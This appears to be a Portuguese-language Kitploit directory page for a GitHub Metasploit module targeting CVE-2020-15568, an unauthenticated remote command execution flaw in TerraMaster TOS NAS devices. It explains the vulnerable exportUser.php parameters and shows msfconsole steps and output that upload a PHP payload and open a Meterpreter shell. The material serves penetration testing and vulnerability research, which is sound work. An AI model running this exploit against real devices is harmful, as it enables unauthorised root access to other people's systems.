Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
TerraMaster-TOS-CVE-2020-15568 — Repository for CVE-2020-15568 Metasploit module | Kitploit
Ferramentas/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

Repository for CVE-2020-15568 Metasploit module

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 3 anosAinda não revisado

TerraMaster TOS CVE-2020-15568

Repositório para o módulo Metasploit CVE-2020-15568

Aplicação Vulnerável

Descrição

Existe uma vulnerabilidade de invocação dinâmica de método de classe no arquivo include/exportUser.php que leva à execução de comandos remotos em dispositivos TerraMaster com privilégios de root. O arquivo vulnerável requer que vários parâmetros HTTP GET sejam fornecidos para alcançar a chamada de método e explorar esta vulnerabilidade. Na primeira linha, a aplicação inclui app.php que carrega automaticamente classes centrais relevantes do software TOS. A aplicação decide a operação com base no valor do parâmetro GET type. Se o valor da variável type for diferente de 1 ou 2, então é possível alcançar o código vulnerável. No código-fonte do exportUser.php, a aplicação requer os parâmetros HTTP GET cla (abreviação de class), func e opt.

Durante a revisão de código de outros arquivos também, descobriu-se que há uma maneira de explorar este problema com classes pré-existentes no software TOS. A classe PHP localizada em include/class/application.class.php é a melhor candidata para executar comandos em dispositivos que executam o software TOS. Como o exportUser.php não possui controles de autenticação, é possível para um atacante não autenticado alcançar a execução de código

Passos de Verificação

  1. Configure seu NAS TerraMaster com a versão 4.1.24 ou inferior do TOS
  2. Inicie o msfconsole
  3. Faça: use exploit/multi/http/terramaster_command_exec
  4. Faça set rhost 192.168.1.27
  5. Faça: check
root@kitploit:~
[+] 192.168.1.27:80 - The target is vulnerable.

Alvos

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

Cenários

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >
Baixar ferramenta